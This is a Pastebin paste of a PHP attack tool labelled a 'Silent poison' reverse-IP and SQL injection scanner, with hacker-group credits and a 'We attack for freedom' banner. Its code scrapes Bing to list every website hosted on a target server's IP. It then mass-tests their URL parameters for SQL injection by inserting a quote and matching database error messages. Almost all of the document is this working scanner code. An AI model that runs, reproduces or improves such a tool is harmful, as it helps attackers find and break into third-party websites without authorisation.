Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $head = '
- <html>
- <head>
- </script>
- <title>--==[[ Silent poison Bing-Google Reverse Ip-Domain Scanner By Thừa Lâm]]==--</title>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <STYLE>
- body {
- background-image: url("http://totallyrelatable.com/wp-content/uploads/2014/01/hardwood-background-tileblack-wood-background-home-improvement-yasmd2ot.jpg");
- background-position: center center;
- background-repeat: no-repeat;
- background-size: 1000px 500px;
- background-color: #000000;
- background-attachment: fixed;
- font-family: Tahoma
- }
- tr {
- BORDER: dashed 1px #333;
- color: #FFF;
- }
- td {
- BORDER: dashed 1px #333;
- color: #FFF;
- }
- .table1 {
- BORDER: 0px Black;
- BACKGROUND-COLOR: Black;
- color: #FFF;
- }
- .td1 {
- BORDER: 0px;
- BORDER-COLOR: #333333;
- font: 7pt Verdana;
- color: Green;
- }
- .tr1 {
- BORDER: 0px;
- BORDER-COLOR: #333333;
- color: #FFF;
- }
- table {
- BORDER: dashed 1px #333;
- BORDER-COLOR: #333333;
- BACKGROUND-COLOR: Black;
- color: #FFF;
- }
- input {
- border : solid 2px;
- border-color : #333;
- BACKGROUND-COLOR: white;
- font: 10pt comic sans ms;
- color: black;
- }
- select {
- BORDER-RIGHT: Black 2px solid;
- BORDER-TOP: #DF0000 1px solid;
- BORDER-LEFT: #DF0000 1px solid;
- BORDER-BOTTOM: Black 1px solid;
- BORDER-color: #FFF;
- BACKGROUND-COLOR: Black;
- font: 8pt Verdana;
- color: Red;
- }
- submit {
- BORDER: buttonhighlight 2px outset;
- BACKGROUND-COLOR: Black;
- width: 40%;
- color: white;
- }
- textarea {
- border : dashed 2px #333;
- BACKGROUND-COLOR: Black;
- font: Fixedsys bold;
- color: #999;
- }
- BODY {
- SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
- margin: 1px;
- color: Red;
- background-color: Black;
- }
- .main {
- margin : -287px 0px 0px -490px;
- BORDER: dashed 1px #333;
- BORDER-COLOR: #333333;
- }
- .tt {
- background-color: Black;
- }
- A:link {
- COLOR: White; TEXT-DECORATION: none
- }
- A:visited {
- COLOR: White; TEXT-DECORATION: none
- }
- A:hover {
- color: Red; TEXT-DECORATION: none
- }
- A:active {
- color: Red; TEXT-DECORATION: none
- }
- </STYLE>
- <script language=\'javascript\'>
- function hide_div(id)
- {
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id)
- {
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id)
- {
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>'; ?>
- <html>
- <head>
- <?php
- echo $head ;
- echo '
- <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
- <td width="100%" align=center valign="top" rowspan="1"><font color=#white size=5 face="comic sans ms"><b>--==[[ SQLi Scanner Tool ]]==--</font><br>
- <font color=white size=5 face="comic sans ms"><b>--==[[ Bing-Google Reverse IP</font><font color=white size=5 face="comic sans ms"><b> Domain lookup Scanner by</font><font color=white size=5 face="comic sans ms"><b> Thừa Lâm ]]==--</font> <div class="hedr">
- <td height="10" align="left" class="td1"></td></tr><tr><td
- width="100%" align="center" valign="top" rowspan="1"><font
- color="white" face="comic sans ms"size="1"><b>
- <font color=#white>
- ################################################</font><font color=white>################################################</font><font color=white>################################################</font><br><font color=white>-==[[Thanks to]]==--</font><font color=white>Ghost Team-Hacking and Security ,Madleets Team,PhanTom Hacker,Indishell,MA Hacking-Sec<br>
- <font color=white>--==[[Interface Desgined By]]==--</font><br><font color=white>Thừa Lâm</font><br><font color=#White>
- ################################################</font><font color=white>#################################################</font><font color=white>################################################</font>
- </table>
- </table> <div align=center><font color=white font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%"><span class="footerlink">We are Vietnamese Soilder ....We attack for freedom</span></marquee><br></font></div><div align=center><font size=4 color=white face="comic sans ms">--==[[ Code for Checkers,Testers,Hackers and Pentester ]]==--</font><p>
- ';
- ?>
- <body bgcolor=black><div align=center><font color=white size=3 face="comic sans ms">
- <form method=post>
- <font color=white font size=5>--==[[<input type=submit name=hosted value="Reverse IP(Websites on server)">||>>++++<<||
- <input type=submit name=sql value="Bing based SQL Injection Finder">||>>++++<<||<input type=submit name=scan value="Mass SQLI finder">]]==--</font><font size=4><p>
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|||||<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<</font><p>
- </form>
- <?php
- error_reporting(0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
- {
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[1]);
- $ar=trim($ar1[0]);
- return $ar;
- }
- function getHost($Address)
- {
- $parseUrl = parse_url(trim($Address));
- return trim($parseUrl[host] ? $parseUrl[host] : array_shift(explode('/', $parseUrl[path], 2)));
- }
- function sql($tu)
- {
- $ch = curl_init();
- $url=str_replace("=","='",$tu)."<br>";
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- $content=$result['EXE'] = curl_exec($ch);
- if(preg_match("/You have an error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$content))
- {
- echo "<div align=center><table width=90% border=1 ><tr><td align=center><font color=red size=4 face='comic sans ms'> i got sql injection symtoms in website <font color=white size=4 face='comic sans ms'> $tu </font> </font></td></tr></table>";
- }
- else
- {
- echo "<br>bhai ji check link manually for vulnerability existance :( <br>";
- }
- }
- function e($i,$q,$p)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q=ip%3A' .$i . '+'.$q.'&go=&qs=n&first=' . $p.'0&FORM=PERE');
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com');
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
- return $result['EXE'] = curl_exec($ch);
- curl_close($ch);
- }
- ?>
- <?php
- if(isset($_POST['scan']))
- {
- ?>
- <form method=post><font color=white size=4 face="comic sans ms">
- Target server Ip/Website: <br>||<br>\/<br><input type=text name=serverip value=127.0.0.0> <p>
- <input type=submit name=billu value="extract domains for scanning"><p>
- </form>
- <?php
- }
- ?>
- <?php
- error_reporting(0);
- if(isset($_POST['billu']))
- {
- $iw=$_POST['serverip'];
- $rr=ereg_replace("(https?)://", "", $iw);
- $web= ereg_replace("www.", "", $rr);
- echo "<font color=white>Server Ip is ".gethostbyname($web)."</font>";
- $server=gethostbyname($web);
- echo "</font><br>###############################################<br>";
- echo "<font size=4 color=white>List of Hosted Website is Given Below...... </font><br>";
- $var=0;
- $alllinks=array();
- do
- {
- $pgs=$var;
- $link="http://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE";
- $uurl=file_get_contents($link);
- if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl))
- {
- //echo "next page link exist";
- $r=1;
- $pdata=e($server,$qu,$pgs);
- if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER))
- {
- foreach($i as $match)
- {
- $total=$match[0]."\n" ;
- $domain=entre2v2($total,"a href=\"","\" h=\"ID=");
- $URL=gethost($domain);
- $li=ereg_replace("www.", "", $URL);
- //echo $li."\n";
- array_push($alllinks,$li);
- }
- }
- }
- else{
- $r=0;
- }
- $var++;
- }while($r!='0');
- $lastarray=array_unique($alllinks);
- echo "<form method=post>";
- echo "<textarea rows=10 cols=50 name=a>";
- foreach($lastarray as $sw){
- echo $sw."\n";
- }
- echo "</textarea>";
- echo "<p><input type=submit name=msqli value=\"Start SQLI scanning\"></form>";
- }
- ?>
- <?php
- if(isset($_POST['msqli']))
- {
- $a=explode("\n",$_POST['a']);
- foreach($a as $sa)
- {
- echo $URL=trim($sa);
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL,$URL );
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/');
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
- $result['EXE'] = curl_exec($ch);
- $result['ERR'] = curl_error($ch);
- curl_close($ch);
- if ( empty( $result['ERR'] ) )
- {
- if(preg_match_all('/<a\s+href=["\']([^"\']+)["\']/i', $result['EXE'],$i, PREG_SET_ORDER))
- {
- foreach($i as $match)
- {
- $text1=$match[1] ."<br>";
- echo $domain=getHost($URL)."/".$text1;
- if(preg_match("/=/i",$domain))
- {
- sql($domain);
- }
- else {
- echo "<br><font color=white> Link don't have dynamic parameter<br>";
- }
- }}}
- }
- }
- ?>
- <?php
- if(isset($_POST['hosted']))
- {
- ?>
- <form method=post>
- <font size=4>Website/Ip</font> <br>||<br>\/<br> <input type=text name=ip >
- <p><input type=submit name=s value="Extract Hosted Websites"></form>
- <?php
- }
- ?>
- <?php
- set_time_limit(0);
- error_reporting(0);
- if(isset($_POST['s']))
- {
- $iw=$_POST['ip'];
- $rr=ereg_replace("(https?)://", "", $iw);
- $web= ereg_replace("www.", "", $rr);
- echo "<font color=white>Server Ip is ".gethostbyname($web)."</font>";
- $server=gethostbyname($web);
- echo "</font><br>###############################################<br>";
- echo "<font size=4 color=white>List of Hosted Website is Given Below...... </font><br>";
- $var=0;
- do
- {
- $pgs=$var;
- $link="http://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE";
- $uurl=file_get_contents($link);
- if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl))
- {
- //echo "next page link exist";
- $r=1;
- $pdata=e($server,$qu,$pgs);
- if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER))
- {
- foreach($i as $match)
- {
- $total=$match[0]."\n" ;
- $domain=entre2v2($total,"a href=\"","\" h=\"ID=");
- $URL=gethost($domain);
- echo "<br><a href=http://".$URL.">".$URL."</a>";
- }}
- }
- else{
- $r=0;
- }
- $var++;
- }while($r!='0');
- }
- ?>
- <?php
- if(isset($_POST['sql']))
- {
- ?>
- <form method=post><font color=white size=4 face="comic sans ms">
- Target server ip/website: <input type=text name=ip value=127.0.0.0>  
- <font color=white size=4 face="comic sans ms"><p>
- Url ==><input type=text name=query value=.php?><p>
- <input type=submit name=ssm value="Enter">
- </form>
- <?php
- }
- ?>
- <?php
- error_reporting(0);
- set_time_limit(0);
- if(isset($_POST['ssm']))
- {
- $wi=$_POST['ip'];
- $rr=ereg_replace("(https?)://", "",$wi);
- $server= ereg_replace("www.", "", $rr);
- echo "<font size=4>Server Under Scaning ==> ". $sr=gethostbyname($server);
- echo "   query ==> ".$qu=trim($_POST['query']);
- echo "</font><br>=====================================================================<br>";
- $var=0;
- do
- {
- $pgs=$var;
- $link="http://www.bing.com/search?q=ip%3A".$sr . "+".$qu."&go=&qs=n&first=" . $pgs."0&FORM=PERE";
- $uurl=file_get_contents($link);
- if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl))
- {
- //echo "next page link exist";
- $r=1;
- $pdata=e($sr,$qu,$pgs);
- if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER)) {
- foreach($i as $match) {
- $total=$match[0]."\n" ;
- $domain=entre2v2($total,"a href=\"","\" h=\"ID=");
- echo "<br><font color=red size=4><b>testing link </b></font>".$domain;
- if(preg_match("/=/i",$domain))
- {
- sql($domain);
- }
- else {
- echo "<br><font color=white> link dont have dynamic parameter<br>";
- }
- }
- }
- }
- else{
- $r=0;
- }
- $var++;
- }while($r!='0');
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement